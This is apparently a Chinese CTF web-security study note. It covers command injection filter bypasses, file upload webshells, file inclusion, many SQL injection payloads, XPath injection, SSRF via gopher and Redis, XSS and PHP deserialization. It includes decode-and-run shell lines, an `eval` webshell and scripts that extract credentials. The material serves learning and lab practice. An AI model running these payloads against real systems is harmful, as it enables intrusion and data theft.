没有对用户输入的内容进行一定过滤直接传给shell_exec、system一类函数执行
看一个具体例子

cmd1|cmd2:无论cmd1是否执行成功，cmd2将被执行

cmd1;cmd2:无论cmd1是否执行成功，cmd2将被执行

cmd1&cmd2:无论cmd1是否执行成功，cmd2将被执行

cmd1||cmd2:仅在cmd1执行失败时才执行cmd2

cmd1&&cmd2:仅在cmd1执行成功后时才执行

<?php 
$str="";
if(!empty($_GET)){
    $str=$_GET["calc"];
}
    echo "result:".shell_exec("echo $str | bc");
?>

这里只需要利用;将str截断，接着可以执行我们自定义的命令了，一个可能的payload： calc=1;cat /flag;

一般的题不会这么简单，往往会对用户的输入进行一定的过滤

关键字过滤绕过

# 关键字过滤
# 用*匹配任意
cat fl*  
cat fla* 
# 反斜线绕过
ca\t fla\g.php  
# 过滤cat可用其他命令，tac/more/less
tac flag.php
# 过滤/
#在linux的系统环境变量中${PATH:0:/}代替/
ls flag_is_here{PATH:0:1}    
# 两个单引号绕过，双引号也可以
cat fl''ag.php    
# 用[]或者{}匹配，[]匹配[]中任意一个字符，{}表示匹配大括号里面的所有模式，模式之间使用逗号分隔
cat fl[a]g.php       
# 变量替换与拼接
a=fl;b=ag;cat $a$b          
# 把flag.php复制为flaG
cp fla{g.php,G}   
# 利用空变量  使用$*和$@，$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下，上面的特殊变量都是为空的 
ca${21}t flag.php   

编码绕过

# 编码绕过    
# base64编码绕过(引号可以去掉)  |(管道符) 会把前一个命令的输出作为后一个命令的参数
echo "Y2F0IGZsYWcucGhw" | base64 -d | bash      
# hex编码绕过(引号可以去掉)
echo "63617420666c61672e706870" | xxd -r -p | bash       
# sh的效果和bash一样
echo "63617420666c61672e706870" | xxd -r -p | sh 

空格过滤绕过

${IFS}$9
{IFS}
$IFS
${IFS}
#$1改成$加其他数字貌似都行
$IFS$1 
# {command,param}，需要用{}括起来
{cat,flag.php}
# \x09表示tab,\x20空格
X=$'cat\x09./flag.php';$X       

嵌套执行

?c=eval($_GET[1]);&1=system('cat flag.php');

过滤分号

#最后一条语句可不加;直接使用?>闭合
include%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

payload

//题目过滤
<?php
	if(!isset($_POST["iipp"]))
		echo '';
	else{
		if(preg_match("/\;|cat|ls|ll|\/|l|:|flag|IFS| |\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x26|\>|\<|\\\\|{|}|\&|\?/i", $iipp)){
			die("hacker!!!");
		}
		$result=shell_exec('ping -c 4 '.$iipp);
		$result=str_replace("\n","<br>",$result);
		echo $result;
?>
//payload
//过滤斜杠，因此必须堆叠注入
//过滤分号，用%0a代替 
//过滤空格，用%09代替
//过滤cat，使用ca''t绕过查看index.php
//过滤l（这题最刁钻的地方），ls无法使用且flag文件名只能用通配，find查看目录结构，配合grep读取flag，但是要注意递归深度，加上-maxdepth

127.0.0.1%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0afind%09.%09-maxdepth%091%09|xargs%09grep%09"ag"%09.&submit=Ping

这段代码是一个简单的PHP脚本，用于执行ping命令来测试指定IP地址的连通性。在代码中，它首先检查是否有iipp参数通过POST请求传递给脚本。如果没有传递iipp参数，则不执行任何操作。

如果传递了iipp参数，代码会使用正则表达式检查参数值是否包含一些特定字符，包括分号、cat、ls、/、l、:、flag等等。如果参数值中包含这些字符，代码会输出"hacker!!!"并终止脚本的执行。

模式分隔符后的"i"标记这是一个大小写不敏感的搜索

否则，代码会使用shell_exec函数执行"ping -c 4"命令，并将结果存储在$result变量中。然后，它将结果中的换行符替换为HTML标签"<br>"，然后输出$result。

根据题目要求的payload过滤情况，我们可以看到以下细节：

- 斜杠（/）被过滤，无法执行目录遍历。但我们可以通过堆叠多个%0a（换行符）来绕过这个过滤限制。
- 分号（;）被过滤，无法使用多个命令执行。但我们可以使用%0a来代替换行符，以实现命令的分隔。
- 空格被过滤，无法直接使用空格。我们可以使用URL编码的%09来代替空格。
- cat被过滤，无法直接使用cat命令查看文件内容。但我们可以通过将cat拆分成两部分（ca''t），来绕过这个过滤限制。
- l被过滤，无法直接使用ls命令查看文件列表。但我们可以使用其他命令，例如find配合grep来模拟ls的功能。

find命令 - 基于目录深度的搜索

-maxdepth： 指定遍历搜索的最大深度

例：查找当前目录下以get开头的所有文件

-mindepth： 指定开始遍历搜索的最小深度

例：查找深度距离当前目录至少2个子目录的所有文件

ps：以上两个参数均已当前目录 . 作为起始深度1

       使用-maxdepth和-mindepth基于目录深度的搜索时，该参数应该作为find的第一种参数出现，否则会进行一些不必要的检查导致影响find的效率。

       比如同时用-maxdepth和-type，如果-type在前，find会找出符合文件类型的所有文件接着再匹配符合指定深度的（相当于还是把当前目录及子目录遍历搜索个底朝天）；而如果-maxdepth在前，find就能够在找到所有符合指定深度的文件后，在匹配这些文件的类型。

在第二层子目录和第四层子目录之间查找passwd文件。

1    # find -mindepth 3 -maxdepth 5 -name passwd
2    ./usr/bin/passwd
3    ./etc/pam.d/passwd
 

xargs
之所以能用到这个命令，关键是由于很多命令不支持|管道来传递参数，而日常工作中有有这个必要，所以就有了xargs命令，例如：

这个命令是错误的
find /sbin -perm +700 |ls -l

这样才是正确的
find /sbin -perm +700 |xargs ls -l   

grep

用法：(75条消息) 一、linux grep命令详解_grep模糊查询_小天才。的博客-CSDN博客

Linux grep (global regular expression) 命令用于查找文件里符合条件的字符串或正则表达式。

grep 指令用于查找内容包含指定的范本样式的文件，如果发现某文件的内容符合所指定的范本样式，预设 grep 指令会把含有范本样式的那一列显示出来。若不指定任何文件名称，或是所给予的文件名为 -，则 grep 指令会从标准输入设备读取数据。

grep [options] pattern [files]
或
grep [-abcEFGhHilLnqrsvVwxy][-A<显示行数>][-B<显示列数>][-C<显示列数>][-d<进行动作>][-e<范本样式>][-f<范本文件>][--help][范本样式][文件或目录...]

• pattern - 表示要查找的字符串或正则表达式。
• files - 表示要查找的文件名，可以同时查找多个文件，如果省略 files 参数，则默认从标准输入中读取数据。

常用选项：：

• -i：忽略大小写进行匹配。
• -v：反向查找，只打印不匹配的行。
• -n：显示匹配行的行号。
• -r：递归查找子目录中的文件。
• -l：只打印匹配的文件名。
• -c：只打印匹配的行数。

1、在文件 file.txt 中查找字符串 "hello"，并打印匹配的行：

grep hello file.txt

3、在标准输入中查找字符串 "world"，并只打印匹配的行数：

echo "hello world" | grep -c world

根据上述分析，我们可以构造以下payload来绕过这些过滤限制并执行命令：

127.0.0.1%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0acd%09..%0afind%09.%09-maxdepth%091%09|xargs%09grep%09"ag"%09.&submit=Ping
管道符会把前一个命令的输出作为后一个命令的参数

这个payload首先通过堆叠%0a来达到目录遍历的效果（cd ..），然后使用find命令在当前目录下进行递归搜索，配合grep命令来查找包含"ag"字符串的文件。最后，通过xargs命令将搜索结果传递给grep命令进行筛选。该payload通过使用URL编码的%09来代替空格，以及将cat拆分成两部分，绕过了过滤限制。

0X02 文件上传
漏洞原理
文件上传漏洞主要是因为Web应用在设计和开发文件上传功能时，没有对用户上传的文件进行充分的检测及防御，导致恶意的可执行文件上传至Web服务器并造成损害，一般要结合文件包含漏洞配合使用

绕过方式
如果知道了防护手段，就能见招拆招，下列是常见的三种防护方式：

对上传文件扩展名进行严格过滤，设置白名单机制只允许特定扩展名文件上传，严格过滤扩展名为“.php、.asp、.bat”等可执行文件上传

限制目录权限，对于文件上传目录设置可读、可写、不可执行权限，禁止用户上传的文件在后台执行

隐藏文件上传目录，用户上传文件的目标目录对用户隐藏。

前端JS验证绕过
利用bp抓包修改或者修改JS代码

黑白名单绕过
常见后缀：phtml、php3、php4、php5、Php、pphphp（适用于空格替换的双写绕过）
上传成功后，测试是否能够解析

文件类型检测
检测的方式包括：content-type、内容和文件头等
判断文件头：抓包在文件内容增加GIF89a
判断文件内容：制作图片马

截断绕过
上传文件发现回显保存路径
成功的条件：php版本小于5.3.4且magic_quotes_gpc=off

<?检测绕过

<script language="php">eval($_POST[cmd]);</script>
Get：在上传路径处 …/upload/1.php%00
Post：对…/upload/1.php后进行16进制hex修改为00
抓包修改为：1.php;jpg或者1.php%00.jpg或者1.php/00.jpg
条件竞争漏洞
文件上传进行验证的短暂时间内,服务器对传入的文件进行了临时保存，在这短暂时间内php是可以解析的
利用bp抓包，设置多线程，不断发包；浏览器访问连接我们上传的木马文件
 

//连接脚本
import requests
url = "http://127.0.0.1/upload-labs/upload/shell.php.7z"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
	    print("NO")

apache解析漏洞绕过

1. 上传图片马evil.php.xxx.abc

2. 上传.htaccess，内容为

 <FilesMatch "evil.php.xxx.abc">
	       SetHandler application/x-httpd-php
 </FilesMatch>

.user.ini
跟.htaccess后门比，适用范围更广，nginx/apache/IIS都有效，而.htaccess只适用于apache
条件：

0X03 文件包含
漏洞原理
通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意外的文件泄漏甚至恶意代码注入，引发漏洞的环境要求为：

allow_url_fopen=On（默认为On）
allow_url_include=Off（5.2版本后默认为Off）
引发漏洞的函数包括include()、require()、include_once()以及require_once()

包含方式
PHP伪协议
允许访问 PHP 的输入输出流、标准输入输出和错误描述符

file://
file:///etc/passwd、file://key.txt

php://

php://input
[post data] <?php phpinfo(); ?>
php://filter

data://
类似于php://input，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。从而导致任意代码执行。

phar://、zip://

phar://数据流包装器自PHP5.3.0起开始有效
phar://E:/phpstudy/www/1.zip/phpinfo.txt
zip://[压缩包绝对路径]#[压缩包内文件]

Apache日志文件包含
利用条件：

日志文件可读
日志存储目录已知（读取服务器配置文件httpd.conf、nginx.conf或者phpinfo()）
Apache运行后一般默认会生成两个日志文件，Windos下是access.log（访问日志）和error.log(错误日志)，Linux下是access_log和error_log，访问日志文件记录了客户端的每次请求和服务器响应的相关信息。
如果访问一个不存在的资源时，如http://www.xxxx.com/<?php phpinfo(); ?>,则会记录在日志中，但是代码中的敏感字符会被浏览器转码，我们可以通过burpsuit绕过编码，就可以把<?php phpinfo(); ?> 写入apache的日志文件

Session文件包含
利用条件：

session内可控变量
session文件可读写，存储路径已知（路径可在phpinfo的session.save_path得到）
常见存储路径：
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
Session文件格式
sess_[phpsessid] ，phpsessid 在发送的请求的 cookie 字段中
临时文件包含

php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件

文件名获取方法：

暴力猜解
phpinfo php varirables获取上传文件的存储路径和临时文件名
上传文件包含
很多网站通常会提供文件上传功能，配合上传文件漏洞，访问上传的文件
1
其他包含
SMTP日志
xss

绕过方式

1. 漏洞原理
   web应用程序对用户输入数据的合法性没有判断或过滤不严格，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息

   在页面中有数据交互的地方，攻击者构造sql语句，使web服务器执行恶意命令访问数据库。

   SQL注入漏洞满足的两个条件：

   - 参数用户可以控制
   - 参数可以带入数据库查询
   
   构造语句是数据库报错，根据报错判断是否存在SQL注入

   攻击方式
   基础知识
   information_schema：SCHEMATA、TABLES、COLUMNS

   SCHEMATA：存储的库名
   TABLES：记录了用户创建的所有数据库的库名(TABLE_SCHEMA)和表名(TABLE_NAME)
   COLUMNS：存储了该用户创建的所有数据库的库名(TABLE_SCHEMA)、表名(TABLE_NAME)和字段名(COLUMN_NAME)
   注释符

   #：注释从#字符到行尾
   --：注释从–序列到行尾，使用注释时，后面需要跟一个或多个空格
   /**/：注释/**/中间的字符，若/**/中间有感叹号，则有特殊意义，如/*！55555,username*/，若mysql版本号高于或等于5.55.55，语句将会被执行，如果！后面不加入版本号，mysql将会直接执行SQL语句
   类型
   SQL注入可分为字符型和数字型,字符型注入要注意字符串闭合问题
   数字型猜测SQL语句为select * from table where id=8
   字符型猜测SQL语句为select * from table where username='admin'

   Union注入

   Mysql允许复合查询(多个SELECT语句并列查询)，并将返回单个结果集。这些组合查询通常称为并或复合查询。

   /*注入存在判断*/
   ?id=1
   ?id=1'
   ?id=1' and 1=1 --+
   ?id=1' and 1=2 --+
   
   /*判断字段数*/
   ?id=1' order by 3 --+
   
   /*union查询库名和用户*/
   ?id=-1' union select 1,database(),user() --+
   /*查询表名*/
   ?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security' ) --+
   /*查询字段*/
   ?id=-1' union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails' ) --+
   /*查询数据*/
   id=-1' union select 1,database(),(select group_concat(id,email_id) from emails  ) --+
   
   

   Bool盲注

   布尔盲注就是根据页面返回的true和flase猜测

   length(str)：返回str字符串的长度
   substr(str, pos, len)：将str从pos位置开始截取len长度的字符返回。注意这里的pos位置是从1开始的，不是数组的0开始
   mid(str,pos,len):跟上面的一样，截取字符串ascii(str)：返回字符串str的最左面字符的ASCII代码值
   ord(str):返回ascii码
   if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1>2,1,0),返回0
   
   /*注入存在判断*/
   id=1  显示数据
   id=1' 不显示数据
   
   /*测试数据库长度*/
   id=1’ and length(database())=1 --+
   /*判断数据库名，结合burp cluster bomb爆破*/
   id=1' and substr(database(),1,1)='s' --+
   /*爆表名*/
   id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
   /*爆字段名*/
   id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='d' --+
   /*爆字段内容*/
   id=1' and substr((select email_id from emails limit 0,1),1,1)='x' --+
   

   时间盲注

   时间盲注和布尔盲注很像，页面不返回任何信息，采用延迟函数根据页面反应的时间进行判断是否存在注入点

   # 爆数据库长度
   ?id=1' and if(length(database())>1,sleep(6),1) --+
   # 爆数据库名
   ?id=1' and if(substr(database(),1,1)='s',sleep(6),1) --+
   # 爆表名
   ?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(6),1) --+
   # 爆字段名
   ?id=1' and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='d',sleep(6),1) --+
   # 爆字段内容
   ?id=1' and if(substr((select email_id from emails limit 0,1),1,1)='x',sleep(6),1) --+
   

   报错注入updataxml

   updatexml(Xml_document,Xpathstring,new_value)
       Xml_document：目标文档
       Xpathstring：路径
       new_value：更新的值
   
   爆数据库名：
   username=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
   爆数据库表名：
   username=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+
   爆字段名：
   username=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
   爆数据值：
   username=1' and updatexml(1,substring(concat(0x7e,(select group_concat(username,0x3a,password,0x3a) from test.users),0x7e),32,64),1) --+
   

   extractvalue

extractvalue(Xml_document,XMLstring)
    Xml_document：目标文档
    Xpathstring：XML路径
爆数据库名：
username=1' union select 1,(extractvalue(1,concat(0x7e,(select database())))) --+
爆数据库表名：
username=1' union select 1,(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test')))) --+
爆字段名：
username=1' union select 1,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='users'))))--+
爆数据值：
username=1' union select 1,(extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from security.users)))) --+

• floor

• database()+floor(rand(0)*2)作为主键，
  由于floor(rand(0)*2)只会产生0和1两个数字，因此主键只可能为database()+1和database()+0
  而count(*)不只是0和1，插入的时候会出现主键重复，更加详细的见参考文章
  
  #爆数据名
  username=1' and (select 1 from  (select count(*),concat(database(),floor(rand(0)*2))x from  information_schema.tables group by x)a) --+

  堆叠注入

  多条SQL语句一起执行，每条语句中间用;隔开

• username：aaa
  password:bbb';insert into users(id,username,password) values(60,'root','root')
  
  # SQLMAP跑表单注入
  
  --form模式 sqlmap.py -u "ip/login.php" --form
  sqlmap.py -u "ip/login.php" --data "username=admin&password=123123" --flush-session
  sqlmap.py -r c:\数据包.txt
  

  二次注入

  将攻击语句写入数据库，等待其他功能从数据库中调用攻击语句，在其他功能语句拼接的过程中没有过滤严格从而造成SQL注入
  原理：

• 攻击者第一次提交恶意输入
  恶意输入存入数据库
  攻击者二次提交输入
  为了响应第二次的输入程序查询数据库取出恶意输入构造SQL语句形成二次注入

贴个脚本自行领会

import requests
import re
register_url = 'http://challenge-ea58755c8ac8a874.sandbox.ctfhub.com:10800/register.php'
login_url = 'http://challenge-ea58755c8ac8a874.sandbox.ctfhub.com:10800/login.php'


for i in range(1, 100):
    register_data = {
        'email': '111@1234.com%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
        'email': '111@1234.com%d' % i,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')

宽字节注入

宽字节注入是通过编码绕过后端代码的防御措施，列如正则过滤和转义函数转义。

客户端采用GBK编码格式，数据库对用户输入进行转义\,转义符\的编码为%5c，添加编码%df,组成%df%5c，此时编码表达为繁体字連，从而绕过转义符让'逃逸。

?id=1%df%27 and 1=1 --+?id=1%df%27 and 1=2 --+
?id=1%df%27 order by 4--+
?id=-1%df%27 union select 1,database(),user() --+  #注出数据库名和用户
?id=-1%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --+ #查询表名
?id=-1%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,3)),database() --+ #查询users中的字段名
?id=-1%df%27 union select 1,(select username from users limit 7,1),(select password from users limit 7,1) --+ #取出一组数据,取出全部用group_concat(username,password)

Cookie注入

Cookie注入就是Cookie处存在注入点，后端对Cookie没有过滤

admin' and 1=1 --+  #显示数据admin' and 1=2 --+  #不显示数据
admin' order by 3 --+
ad' union select 1,database(),3  --+
ad' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3  --+
ad' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='emails'),3  --+
ad' union select 1,(select group_concat(id,email_id) from emails),3  --+

base64注入

和其他注入一样，多了个base64编码解码

漏洞原理
XPath 注入利用 XPath 解析器的松散输入和容错特性，能够在 URL、表单或其它信息上附带恶意的 XPath 查询代码，以获得高权限信息的访问权。

XPath注入类似于SQL注入，当网站使用未经正确处理的用户输入查询 XML 数据时，

XML 被设计用来传输和存储数据。

HTML 被设计用来显示数据。

XML 指可扩展标记语言（eXtensible Markup Language）。

可能发生 XPATH 注入，由于Xpath中数据不像SQL中有权限的概念，用户可通过提交恶意XPATH代码获取到完整xml文档数据

攻击方式
Xpath和Xquery语法
“nodename” – 选取nodename的所有子节点
“/nodename” – 从根节点中选择
“//nodename” – 从当前节点选择
“…” – 选择当前节点的父节点
“child::node()” – 选择当前节点的所有子节点
“@” -选择属性
"//user[position()=2] " 选择节点位置
攻击思路
 

通用payload，类似于'or '1'='1
']|//*|//*['

从根节点开始判断
'or count(/)=1  or '1'='2     ###根节点数量为1
'or count(/*)=1 or '1'='2   ##根节点下只有一个子节点
判断根节点下的节点长度为8：
'or string-length(name(/*[1]))=8 or '1'='2
猜解根节点下的节点名称：
'or substring(name(/*[1]), 1, 1)='a'  or '1'='2
'or substring(name(/*[1]), 2, 1)='c'  or '1'='2
..
'or substring(name(/*[1]), 8, 1)='s'  or '1'='2
猜解出该节点名称为accounts
'or count(/accounts)=1  or '1'='2   /accounts节点数量为1
'or count(/accounts/user/*)>0 or '1'='2    /accounts下有两个节点

'or string-length(name(/accounts/*[1]))=4  or '1'='2    第一个子节点长度为4
猜解accounts下的节点名称
'or substring(name(/accounts/*[1]), 1, 1)='u'  or '1'='2
...
'or substring(name(/accounts/*[1]), 4, 1)='r'  or '1'='2
accounts下子节点名称为user
'or count(/accounts/user)=2  or '1'='2   
第一个user节点的子节点长度为8：
'or string-length(name(/accounts/user[position()=1]/*[1]))=8 or '1'='2
读取user节点的下子节点
'or substring(name(/accounts/user[position()=1]/*[1]), 1, 1)='u'  or '1'='2
'or substring(name(/accounts/user[position()=1]/*[1]), 2, 1)='s'  or '1'='2
...
'or substring(name(/accounts/user[position()=1]/*[1]), 8, 1)='e'  or '1'='2

参考文章

XPATH注入学习

0X07 SSRF

SSRF(service side request forgery) 是一种由攻击者构造，由服务端发起请求的一个网络攻击，一般用来在外网探测或攻击内网服务

常见漏洞形式
所有调外部资源的参数都有可能存在ssrf漏洞，例如：
http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=http://外部url/1.png

分享：通过URL地址分享网页内容

转码服务

在线翻译

图片加载与下载：通过URL地址加载或下载图片

图片、文章收藏功能

未公开的api实现以及其他调用URL的功能

从URL关键字中寻找

`share`、`wap`、`url`、`link`、`src`、`source`、`target`、`u`、`3g`、`display`、`source`、`URlimage`、`URLdomain`

相关函数
file_get_contents()：将整个文件或一个url所指向的文件读入一个字符串中。

readfile()：输出一个文件的内容

fsockopen()：打开一个网络连接或者一个Unix 套接字连接。

curl_init()：初始化一个新的会话，返回一个cURL句柄，供cur_lsetopt()，curl_exec()和curl_close() 函数使用

fopen()：打开一个文件文件或者 URL

相关协议
file协议：在有回显的情况下，利用 file 协议可以读取任意文件的内容
dict协议：泄露安装软件版本信息，查看端口，操作内网redis服务等
gopher协议：gopher支持发出GET、POST请求。可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell
http/https协议：探测内网主机存活

利用方式
访问内网
http://challenge-54ab013865ee24e6.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/flag.php
伪协议读取文件
http://challenge-54ab013865ee24e6.sandbox.ctfhub.com:10080/?url=file:///var/www/html/flag.php
端口扫描
http://challenge-54ab013865ee24e6.sandbox.ctfhub.com:10080/?url=http://127.0.0.1:8000
burpsuite抓包修改端口，使用intruder爆破
Gopher
gopher协议是一种信息查找系统，将Internet上的文件组织成某种索引，方便用户从Internet的一处带到另一处。在WWW出现之前，Gopher是Internet上最主要的信息检索工具，Gopher站点也是最主要的站点，使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等，也可以发送 GET、POST 请求。
使用方式：gopher://ip:port/_METHOD /file HTTP/1.1 http-header&body
HTTP数据包需要进行URL编码，跳转多少次就进行多少次编码，第一次编码后需要将%0A换成%0D%0A
注意url编码采用encodeURIComponent，流程为：
encodeURIComponent->%0A换成%0D%0A->在前面加gopher://127.0.0.1:80/_->encodeURIComponent
FastCGI协议
HTTP是完成浏览器到中间件的请求，FastCGI则是从中间件到后端进行交换的协议，由PHP-FPM按照FastCGI的协议将TCP流解析成真正的数据.
PHP-FPM拿到FastCGI的数据包后，进行解析，得到上述这些环境变量。然后，执行SCRIPT_FILENAME的值指向的PHP文件，也就是/var/www/html/index.php
 

{
	    'GATEWAY_INTERFACE': 'FastCGI/1.0',
	    'REQUEST_METHOD': 'GET',
	    'SCRIPT_FILENAME': '/var/www/html/index.php',
	    'SCRIPT_NAME': '/index.php',
	    'QUERY_STRING': '?a=1&b=2',
	    'REQUEST_URI': '/index.php?a=1&b=2',
	    'DOCUMENT_ROOT': '/var/www/html',
	    'SERVER_SOFTWARE': 'php/fcgiclient',
	    'REMOTE_ADDR': '127.0.0.1',
	    'REMOTE_PORT': '12345',
	    'SERVER_ADDR': '127.0.0.1',
	    'SERVER_PORT': '80',
	    'SERVER_NAME': "localhost",
	    'SERVER_PROTOCOL': 'HTTP/1.1'
	}

- Nginx解析漏洞：
	PHP设置中的一个选项fix_pathinfo导致了这个漏洞
	正常来说，SCRIPT_FILENAME的值是一个不存在的文件/var/www/html/favicon.ico/.php
	PHP为了支持Path Info模式而创造了fix_pathinfo，在这个选项被打开的情况下，fpm会判断SCRIPT_FILENAME是否存在
	如果不存在则去掉最后一个/及以后的所有内容，再次判断文件是否存在，往次循环，直到文件存在。
	所以，第一次fpm发现/var/www/html/favicon.ico/.php不存在，则去掉/.php
	再判断/var/www/html/favicon.ico是否存在
	显然这个文件是存在的，于是被作为PHP文件执行，导致解析漏洞
	正确的解决方法有两种：
	1. Nginx端使用fastcgi_split_path_info将path info信息去除后，用tryfiles判断文件是否存在；
	2. 借助PHP-FPM的security.limit_extensions配置项，避免其他后缀文件被解析。
- PHP-FPM未授权访问漏洞
	PHP-FPM默认监听9000端口，如果这个端口暴露在公网，则我们可以自己构造fastcgi协议，和fpm进行通信
	构造通信时，当然我们想要请求敏感文件，但是现在一般都有文件后缀限制，即你不能直接请求敏感文件夹（默认后缀一般是.php）

问题在于无法执行我们想要的文件，无法进行敏感操作，即使找到了未授权访问，那也只能执行服务器上的固有文件，不过既然能操作环境变量，就可以设置自动包含伪协议。设置auto_prepend_file = php://input且allow_url_include = On，结合文件上传php伪协议利用方式即可

Gopherus
exp地址

Redis协议
Redis在默认情况下，会绑定在0.0.0.0:6379。如果没有采取相关的安全策略，比如添加防火墙规则、避免其他非信任来源IP访问等，这样会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下，会导致任意用户在访问目标服务器时，可以在未授权的情况下访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下，利用Redis自身的提供的config命令，可以进行文件的读写等操作。攻击者可以成功地将自己的ssh公钥写入到目标服务器的/root/.ssh文件夹下的authotrized_keys文件中，进而可以使用对应地私钥直接使用ssh服务登录目标服务器。
Redis协议
 

  攻击者无需认证访问到内部数据，可能导致敏感信息泄露，黑客也可以通过恶意执行flushall来清空所有数据
  攻击者可通过EVAL执行代码，或通过数据备份功能往磁盘写入后门文件
  如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害者服务器
  当然一般情况下，会避免其他非信任来源IP访问，所以通过gopher协议从服务器上进入redis，然后通过终端写马完成攻击。

利用工具同上
Gopherus

进制转换

  ```php
  http://127.0.0.1  >>>  http://0177.0.0.1/
  http://127.0.0.1  >>>  http://2130706433/
  http://192.168.0.1  >>>  http://3232235521/
  http://192.168.1.1  >>>  http://3232235777/
  ```

特殊字体绕过

  ```php
  ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
  ①②⑦.⓿.⓿.①  >>> 127.0.0.1
  ```

特殊地址绕过

  ```php
  http://0/  # 0.0.0.0可以直接访问到本地
  http://127。0。0。1  # 绕过后端正则规则
  http://localhost/
  ```

短链接绕过

  短链接变换通过检索短网址上的数据库链接，再跳转原（长）链接访问

短链接变换推荐链接

SSRF - ctfhub -2

0X08 XSS

XSS 攻击全称跨站脚本攻击，允许恶意 web 用户将代码植入到 web 网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生 xss 攻击

攻击方式

• 判断是否存在XSS漏洞
  <script>alert(1)</script>
• 利用XSS平台接收cookie
  XSS平台

绕过方式

XSS平台有对应的绕过waf过滤的脚本写法，可参考

0X09 序列化与反序列化漏洞
PHP反序列化漏洞
Wakeup反序列化漏洞
漏洞原理
PHP反序列化漏洞：如果一个类定义了__wakup()和__destruct()，则该类的实例被反序列化时，会自动调用__wakeup(), 生命周期结束时，则调用__desturct()。

当序列化字符串中属性值个数大于属性个数，就会导致反序列化异常，从而跳过__wakeup()。

利用方式
先进行序列化操作

得到序列化字符串，将Object数+1

ps：private、protected 类型的变量，序列化之后字符串首尾都会加上%00，字符串长度也比实际长度大 2，如果将序列化结果复制到在线的 base64 网站进行编码可能就会丢掉空白字符，建议直接在php 代码里进行编码；若对%过滤，则可将S大写，然后使用16进制编码绕过

字符逃逸
漏洞原理
反序列化的过程就是碰到;}与最前面的{配对后，便停止反序列化
 

O:6:"people":3:{s:4:"name";s:3:"Tom";s:3:"sex";s:3:"boy";s:3:"age";s:2:"12";}
O:6:"people":3:{s:4:"name";s:3:"Tom";s:3:"sex";s:3:"boy";s:3:"age";s:2:"12";}123123

利用方式

• 字符增多
  在题目中，往往对一些关键字会进行一些过滤，使用的手段通常替换关键字，使得一些关键字增多，简单认识一下，正常序列化查看结果

这里，我们对序列化后的字符串进行了替换，使得后来的反序列化报错，那我们就需要在Tom这里面的字符串做手脚，在username之后只有一个age，所以在双引号里面可以构造我需要的username之后参数的值，这里修改age的值，我们这里将Tom替换为Tom";s:3:"age";s:2:"35";}然后进行反序列化

可以看到构造出来的序列化字符串长度为25，而在上面的反序列化过程中，他会将一个o变成两个oo，那么得到的应该就是s:25:"Toom"我们要做的就是让这个双引号里面的字符串在过滤替换之后真的有描述的这么长，让他不要报错，再配合反序列化的特点（反序列化的过程碰到;}与最前面的{配对后，便停止反序列化）闭合后忽略后面的age:13的字符串成功使得age被修改为35

字符减少

原理是一样的，差别在于我们需要构造额外的数据让它“吞噬”

这里的错误是因为s:5:"zddo"长度不够，他向后吞噬了一个双引号，导致反序列化格式错误，从而报错
